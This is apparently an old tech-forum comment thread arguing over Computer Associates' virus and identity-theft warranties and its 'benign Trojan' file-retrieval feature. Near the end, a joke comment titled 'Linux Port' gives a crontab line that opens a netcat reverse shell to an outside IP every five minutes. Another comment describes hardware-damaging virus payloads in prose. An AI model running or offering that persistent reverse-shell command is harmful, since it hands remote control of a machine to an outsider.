Computer Associates Offers Warranties

Kelvin D. writes, "Computer Associates has come up with a new angle to get consumers to buy its security software — a warranty with cash benefits if you catch a virus ($1,500) or get your identity stolen ($5,000). From the article: 'Users who want the identity theft coverage need to both install and register their copies of Warranty Corporation of America's Mobile Lifeline (included). No registration, no coverage.'" Moblie Lifeline includes something that sounds like a benign Trojan: it lets you retrieve or delete files from your stolen computer if it's ever connected again to the Internet.

question

[jimstapleton]

how do we know they are secure enough to prevent others from hacking in and doing that to your NOT stolen computer that you are using? Seems a huge potential downside.

Re:

[diersing]

How long is the "Acceptable Use" agreement where you agree to never connect to the internet, install any applications, or turn the computer on?

Re:

[jimstapleton]

I could care less about the acceptable use. I'm more worried about their one-stop-shop for hackers who want backdoors.

Re:question

[Em Adespoton]

Along with this thought... how long until someone steals your identity, and contacts them to collect the money (saying that YOU are the one trying to steal their identity)? Similarly, the virus angle looks more like they're offering a bounty on new viruses... much cheaper than them having to do the work themselves (but could also generate gobs of new viruses designed to cash in on the insurance).

Spelling Error

[Anonymous Coward]

Moblie Lifeline includes something that sounds like a benign Trojan: it lts you retrieve or delete files off a stolen computer if it's ever connected to the Internet.

It lets you?

Re:

[JayTech]

The Spell Check Police aren't finished yet! Who's heard of the "Moblie" Lifeline? Everyone already knows the mob lies... sheesh

Call me crazy but

[Ravenscall]

I predict if they honor this and publicize it well, they will be bankrupt within two years.

Re:

[pixelpusher220]

whaddaya bet the 'fine print' on the insurance says you *can't* tell anyone about it?

Re:

[Ravenscall]

If they were Fight Club, they would not be advertising.

Re:

[Anonymous Coward]

I predict if they honor this and publicize it well, they will be bankrupt within two years.

Don't think so. Lets do some math.

Say you spend $25,000, all 500 PCs get botted so bad - 25000-4500 = 20500 profit and their tool doesn't have to work at all.

Now a real guarantee would be a refund of all that you spent in the last 2 years. But what the heck, do it. As if you really cared about security you wouldn't be running Windows with it's track record.

5K isn't going to be enough

[TubeSteak]

Those who do register receive up to $5,000 in the event of identity theft. The cash covers lost wages, legal fees, and fixing credit reports.

From what I recall of the various TV segments & news artciles about ID theft, $5,000 is going to even begin covering their losses.

IIRC, most people complain that the process takes years to resolve & tens of thousands of dollars to clean up.

Re:5K isn't going to be enough

[RedHelix]

They've been advertising this service in the TD catalog for a couple of months. The 1,500 warranty is for HARDWARE damage. Obviously, viruses and trojans are unlikely to ever cause a physical hardware problem with the machine, and even if they do it would be impossible to prove. They're essentially promoting a software warranty that they'll never have to honor.

Re:

[Lordpidey]

Really? I've seen viruses that try to force a harddrive to read from a part of the disk that doesn't exist. Lets see how long your harddrive lasts after it slams its arm into the casing every 10 seconds. I've also heard of ones that shutoff your fans causing your processor to overheat (unless the bios steps in)

Re:

[merreborn]

"I've also heard of ones that shutoff your fans causing your processor to overheat"

As far as I know, since the introduction of the Pentium II 10 years ago, just about every BIOS will power your system down if it detects overheating. And most CPUs on the market have some variation of "SpeedStep", to clock down, and eventually halt, themselves in the case of overheating.

These aren't really things you can tamper with in software. Especially SpeedStep.

Re:

[fireboy1919]

That does crash a harddrive...made in 1993. Modern harddrive controllers will not let you address segments of the drive that don't exist. They just throw an error specifically because there were viruses that did this.

Re:

[Bender0x7D1]

You could make a virus that brings all mechanical components (hard drive, CD/DVD drive, fans)up to maximum speed and leaves them there, or alternates starting and stopping them, or anything designed to stress the hardware. You could be sneaky and only do it overnight so no one notices the noise. In a large corporation this abuse is going to kill at least 1 machine and probably more.

You could even be rude and set it to send 1000 completely blackened pages to every printer. Don't know if the warranty wou

they need something like that...

[zogger]

...to fully scratch up the platters in drives when the drive is going to be replaced and destroyed. Some command that would make the read head just scroll back and forth and scratch it all to heck. Obviously it would have to drop down a little, but perhaps it is possible to design them that way with that feature. A niche product but I bet they would sell.

Re:

[kimvette]

Don't give HP any ideas. It's bad enough that the implement expiration dates.

Re:

[ratboy666]

Back when I was young, I wrote some nasty payloads -- proof on concept only. Never attached such a payload to a "virus" or "trojan".

1 - Wait until 3am, then slam the floppy head into the backstop continuously. Also, load/unload the head. Objective: destroy the floppy drive.

2 - Identify a model by vendor. Rewrite the saved settings 10,000 times (damage the nv memory in the modem).

3 - Program out-of-spec settings to the monitor. Attempt to damage a monochrome monitor.

4 - Program nv memory on video card with s

Re:

[slackoon]

Of course 5K won't cover it all but it's a great start and will get you back on yoru feet again after identity theft. Maybe you would have them offer no coverage at all? Take it as a good thing and don't be critical just to make yourself feel better. As for the other comments. I agree that if they honor it they'll be bankrupt within 2 years. I say even less. One virus that exploits one weekness could finish them off! I expect that getting them to honor their "warranty" will be almost impossible but lets h

Re:

[just_another_sean]

5K isn't going to be enough

Agreed. People are going to need at *least* 640K.

It's a trojan political trap

[Travoltus]

This new service will get people used to the idea that they can go around deleting other people's files without due process.

That'll later come back to bite us on the hiney when the RIAA demands this right - which they've done before.

Due process.
Due process.
Due process!

It's slow, it's agonizing, but the alternatives are cutting corners to achieve one's own definition of justice. I don't need to go into detail about the dangers of that...

Re:

[Dr_Barnowl]

I don't see the legal downside of deleting files from your own hardware, even if it happens to be in the possession of a theif.

It's quite the inverse of what the **AA want, which is to be able to delete files on hardware that they do NOT own, as long as they claim "ownership" of the contents.

In this case, the due process is surely that you

• Own the hardware, legally
• Know the password
• Deserve to be able to delete your own files from your own hard drive.

This is no different to deleting files from your

Re:

[Travoltus]

True, but part of my concern was that discerning that it is your own hardware is not always so cut and dry as it sounds in theory. When you get the cops to seize the machine, theoretically speaking, you know for sure.

But the flip side is, the cops are sofa king slow at pursuing these things.

My boss would love this

[celardore]

My work computer got infected by a trojan yesterday. I was browsing a BBS where some malicious user had posted a SWF that opened up some other page on an IP, I'm not sure but I think it could have been the most recent MS IE critical vunerability. My boss spent from 9am to 2pm trying to get rid of a trojan. The antivirus the PC already had was Symantec, which was what first alerted us to it this morning. It couldn't remove it, so we tried AVG and Pandasoft as well as House Call. Nothing would shift the

Re:

[codepunk]

Smile, you deserved it...

Re:

[GotenXiao]

Stick a Linux LiveCD with AVG for Linux on it in the PC. Watch as AVG eradicates virus. Reboot.

Worked for me at i28 when I got a worm that would not die; AVG had blocked it from actually running, but something was keeping it there. Rebooted to my Linux partition, downloaded/installed AVG, worked a treat.

Re:

[Software]

Stick a Linux LiveCD with AVG for Linux on it in the PC.

A friend is having problems with viruses on her machine, and I'm trying to do this, but I have not found a LiveCD distribution with AVG. I've used Knoppix and Mepis, but they have ClamAV instead. I've seen some recommendations for LinuxDefender from bitdefender.com, but it looks like it was last updated in 2004. I'm probably going to use ClamAV from either Knoppix or Mepis, but I'm open to suggestions. Do you have any recommendations?

Re:

[GotenXiao]

Download SLAX. Extract the ISO, chroot to the extraction point, install AVG, remaster the ISO.

Re:

[rohan972]

get Ultimate boot CD [ultimatebootcd.com]. It has AVG, f-prot, McAfee and Avast, as well as a heap of other useful tools.

Fine Print

[HatchedEggs]

This is merely a marketing ploy. Lets be realistic, the fine print will actually keep this occuring in almost any instance.

I am also betting that there will be additional fine print about the identity theft... as it occurs so frequently. Plus, you will have to follow their guidelines. Which will probably include industry best practice information... which if you were willing to follow that, in most instances you wouldn't have a problem with identity theft anyways.

Re:

[Daemonstar]

This is merely a marketing ploy. Lets be realistic, the fine print will actually keep this occuring in almost any instance.

I agree.

Since we're not informed as to what the "fine print" says, it is conceivable that it could include shipping the infected PC to CA or taking it to a "CA Authorized Repair Center", for inspection. If that is so, then there's not telling how long it could be before you get your computer back.

Re:

[rtb61]

It is still far better than a warranty that just offers a refund on the price of the software. The point is with a penalty in place, the company has a powerfull incentive to ensure the quality of their software. Other companies treat software quality like a joke, with warranties that could not legally be used on any other kind of product. This is at least a step in the right direction. Given a choice between a conpany that can't warrant the program itself being free of software viruses and another company w

UP TO

[Thansal]

FTFA

Those who do register receive up to $5,000 in the event of identity theft. The cash covers lost wages, legal fees, and fixing credit reports.

The virus protection program offers up to $1,500 to replace up to three PCs, but only if those machines have "failed" due to the virus (spyware and adware aren't covered). Obviously, this is only a possibility if CA's security software cannot clean the infection.

blod is mine.

5K to fix all the crap you have to deal with if your personal information is ussed maliciou

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:

[sgtrock]

NOT, mind you, because the banking and finance industry, against all common sense, believes my social security number to be not only a positive identifier, but an authentication token that obviously only I could ever know.

I can't speak for every bank, but I know the one that I've worked for for 10 years finally figured out a few years ago that using a customer's SSN for anything other than necessary reporting to the Feds was a Bad Thing (tm). We've been diligently scrubbing databases every place we could e

Re:

[account_deleted]

Comment removed based on user account deletion

There can be only one way to win!

[Mille Mots]

irst you said:

NOT, mind you, because dozens (hundreds? Impossible for me to find out) of companies consider my personal and financial information to be their intellectual property to be sold to other companies.

Then you said:

NOT, mind you, because these companies have basically no interest in protecting the data in that losing it does not hurt them any (maybe a token fine tops). So they don't encrypt it, lose backup tapes, let employees take it home on laptops, etc.

If the data is their IP and source of incom

Re:

[account_deleted]

Comment removed based on user account deletion

I forsee a nice way for some money on the side

[Opportunist]

1. Be another Antivir company.
2. Buy CAI's package.
3. Infect your machines with the latest trojans that NOBODY has any signatures or heuristics for.
4. Profit.

Re:

[Rob T Firefly]

3. Infect your machines with the latest trojans that NOBODY has any signatures or heuristics for.

And what's more 0-day than a brand new virus? I wonder if this could set off a new wave of virus writers, who aren't just doing it to be jerks or prove concepts. Ever see a pyromaniac shop for fire insurance?

It's gonna suck to be CA tech support

[rsilvergun]

the $1500 dollar waranty only kicks in if they can't remove the virus. And hell, what counts as 'removing' a virus anyway. Given that most viruses use random file names and sizes, and many periodically update themselves to change their signatures (becomming 'new' viruses in the process), good luck proving that the virus wasn't fully removed. But that won't prevent the techies from taking the heat from an asshat who thinks he's due $1500.

Re:

[slowbad]

good luck proving that the virus wasn't fully removed

Computer Associates doesn't need techs -- since this is really just an insurance plan (read, profit margin)
they should hire people with HMO experience and a list of excuses like "it was a pre-existing condition."

"benign Trojan"

[Trillan]

Wikipedia calls a Trojan "a malicious program that is disguised as or embedded within legitimate software." Given that, something that the installer knows about and isn't malicious can't really be "a benign Trojan."

Re:

[Ravenscall]

Too bad you are using the Wikipedia definition, and Wikipedia is not research, it is gossip.

Re:

[psmears]

Quite right—the phrase "benign backdoor" would be far more appropriate...

Re:

[maxume]

Wikipidia isn't compatible with phrases like 'can't really be'.

Re:

[Trillan]

I used wikipedia only because it was the first online reference I checked, and it lines up with the classical definition.

And at least spell wikipedia right if you expect to be taken as an authority on it.

Re:

[maxume]

I don't expect to be taken as an authority on it. I love the idea. The process is horribly broken.

My recent favorite example:

http://en.wikipedia.org/wiki/E-mail_address [wikipedia.org]

That page stinks. I look at it and don't even want to try to change it, because I expect to but heads with moron.

My next full time job

[pHZero]

1) Write one new virus a week 2) Infect my own PC 3) Collect weekly salary of $1500 (Profit!!!)

Lets you retrieve files?

[sdirrim]

So, what this seems like is it lets you connect to your stolen computer to retrieve the files. A sort of hidden, unprotected FTP server on your computer. Couldn't this possibly be used by a hacker to steal your files remotely? How does the computer know it has been stolen, and how does it identify the rightful user? And how can you ensure that someone doesn't get your files before you do?

Seems like a potentially dangerous utility, even worse than the Sony rootkit.

Re:

[RAMMS+EIN]

``How does the computer know it has been stolen''

I think that's the key. The program could be such that it will only let you retrieve and delete files once the computer has been reported stolen. Strong cryptography should be enough to prevent spoofing this. At least, I think that's how I would design it.

Identity theft payouts could be interesting

[IIH]

"benefits if you catch a virus ($1,500) or get your identity stolen ($5,000).

"Well, Mr. Smith, our records do show that this identity was proven to be stolen. Of course we paid out according to our warrenty. Our records show the $5,000 was paid out on X date. You didn't receive it? Well, we sent it to Y address. That's not you? Oh, it seems to have been paid to the wrong person, but unfortunately we can't do anything about that, as it appears you've been the victim of identity theft. Want to buy a warrenty to protect you against this in the future? No? Well, have a nice day.

The Fine print

[fenodyree]

If your laptop or personal computer (collectively "PC" and "PC's") fails due to a virus infection after the CA Anti-Virus 2007 software is properly installed and registered, you can receive up to $1,500.00 in technical service and hardware replacement under the limited warranty associated with the CA Anti-Virus 2007 software. Covered malfunctions include:
* Your PC will not boot or start up; or
* Your PC will boot and the hard drive is accessible, but the operating system is malfunctioning, causin

Re:

[RAMMS+EIN]

Also note "up to $1,500.00 in technical service and hardware replacement". That is no cash and at most 1500 USD.

Re:

[spikedvodka]

also I'm sure that they'll pull the old "Our Tech Support is work $1000 per hour, plus Long distance phone charges... stunt.

The <really> Fine print

[smoker2]

Nothing in this warranty shall cause us to be liable in any way shape or form.
We reserve the right to change the wording the moment you make a claim.
We are an insurance company now, and boy are we gonna act like one !

You have to wonder...

[WhiteWolf666]

Why the *HELL* Microsoft doesn't offer Warranty protection like this.

This is a great product, IMHO. This is CA putting their money where their mouth is. I don't know anything about their actual coding abilities, but I really like it from the actual business angle.

As for me, I run OS X & Linux, and have not yet had the need for an anti-virus product, even though an up to date ClamAV does reside on my systems.

Re:

[nbannerman]

Why the *HELL* Microsoft doesn't offer Warranty protection like this.

I'm going to go out on a limb and suggest that having the lion's share of the world's virus, trojan, spyware and other such crap being targetted at your system precludes such an option. (Reasons for this left as an exercise for the reader...)

Re:

[RAMMS+EIN]

Or perhaps one of these "Linux is soooooooo secure" people should back up their claims with a warranty.

Re:

[MadMidnightBomber]

Why the *HELL* Microsoft doesn't offer Warranty protection like this.

Because they only have $40bn in the bank! Ba-dum tish.

Seriously, it's because they don't need to, liability for software flaws being almost the inverse of other forms of liability issues. Next time you have a major outage at work, try telling your boss to sue MS to recoup your lost earnings. Then time how long it takes him to stop giggling.

ugh

[nomadic]

$5,000, but you have to use CA software? Not worth it...

Re:

[LookAtTheMonkey!]

Tommy: Here's how I see it. A guy puts a guarantee on the box 'cause he wants you to fell all warm and toasty inside.

Ted: Yeah, makes a man feel good.

Tommy: 'Course it does. Ya think if you leave that box under your pillow at night, the Guarantee Fairy might come by and leave a quarter.

Ted: What's your point?

Tommy: The point is, how do you know the Guarantee Fairy isn't a crazy glue sniffer? "Building model airplanes" says the little fairy, but we're not buying it. Next thing you know, there's m

Subject to what conditions?

[minerat]

I'm betting you'll have to PROVE that your identity was stolen via your PC. It probably won't be as simple as saying "I have a trojan that you didn't detect and my identity has been stolen". You'll probably have to connect the dots in a whole trail (though I haven't read the fine print, just speculating).

Only works if...

[Apocalypse111]

...it lets you retrieve or delete files from your stolen computer if it's ever connected again to the Internet.

All potential security holes aside, this presumes that the thieves didn't replace your HD after stealing it, or reformat/reinstall. What would be more useful would be a call-home email to your addy that gives you an IP address, nslookup and tracert data, as well as any other information that can be used to track it back to a physical address. Maybe a keystroke log as well, and a list of recently opened files and visited URL's?

not a new angle...

[ccwaterz]

I actually worked for a start up that tried this years ago. The company has been dead for 2 years now, but evidence of it still lingers. Google combinations of "Promisemark", "Virus Protection Plan", "Identity Theft Protection Plan", etc...

Wagon WAY before the horse...

[Vexler]

What CA is doing here is complete nonsense. Several problems spring to mind immediately:

1) Identity theft involves a lot more than just the laptop sitting in front of a user. It involves the user's total awareness of unusual requests for personal information and commitment to protect that information. Social engineering, dumpster diving, and (certainly) user stupidity can all compromise the security of the data. CA will find a good chunk of its customers who were just careless about what they wrote down or told whom, and kick itself in the pants. You can't indemnify human failure.

2) If the laptop is compromised by a virus that sends keystrokes to a Romanian website, CA will want forensic proof. It will have to see conclusive evidence that (a) its software worked correctly and was not subject to accidental or deliberate tampering by the user, (b) any personal information obtained in this manner was used intentionally to impersonate the user and cause harm, and of course (c) that the machine in question "failed" as a direct result of the virus (although to what extent "failed" covers is unclear). Just the resources necessary to conduct proper forensics alone is daunting enough, and $5000 for theft and $1500 for virus infection seems a pittance. It's a lose-lose proposition, and CA is trying to make it sound generous.

3) The offer to encrypt or destroy data on any stolen laptop is laughably absurd, and serves no purpose except as a way to TRY and get the last laugh in. "So you took my laptop? Well, I'll just have to think of a REAL GOOD comebacker. Oh, I know. If you are stupid enough to connect it to the Internet, I can erase what you probably already got off the drive by then. Ha, ha." The machine is gone and at the mercy of the thief, and Josephine User is up the creek with no paddles.

4) Most frustratingly, it is misleading for a technology company to offer services that distorts what "identity theft" really involves. You are not educating the user in the process except "If I lose my laptop I get $$$". You are not providing a truly comprehensive plan to combat this problem. All this "offer" does is to try and make money. Again, clever marketing does not make a bad idea into a good one.

Linux Port

[dbrian1]

crontab -e 0-59/5 * * * * nc 123.123.123.123 999 -e /bin/bash

Benign Trojan?

[plehmuffin]

That sounds about as enticing as a benign tumour